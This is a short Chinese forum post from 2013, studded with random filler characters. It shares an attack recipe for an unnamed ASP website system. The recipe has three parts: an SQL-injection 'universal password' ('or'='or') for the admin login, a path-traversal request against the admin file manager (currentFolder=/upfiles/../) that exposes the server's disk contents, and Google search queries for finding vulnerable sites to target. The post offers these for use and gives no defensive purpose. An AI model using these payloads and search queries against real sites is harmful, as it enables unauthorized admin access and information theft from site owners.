后台万能密码 'or'='or'
& _" _4 k% P. T+ _8 p# U! B4 ^+ F$ x2 ]
后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
9 b1 I3 s& |8 w% |) e' {. H: \admin/uploadfile.asp?currentFolder=/upfiles/../5 P, Q7 ]+ d/ q# I
6 x8 h- v- [( W N( K漏洞证明:
# z, M. d' X; s* x
5 r4 L3 B! v" q" ?谷歌:inurl:type.asp?id=1 新闻中心, _0 l% b9 a. x& {$ ?8 U
或者 :inurl:download_ok.asp?6 F2 `: \- { z0 u
9 `, H. J) G6 _ |
发表于 2013-3-14 20:17:32
收藏
分享
支持
反对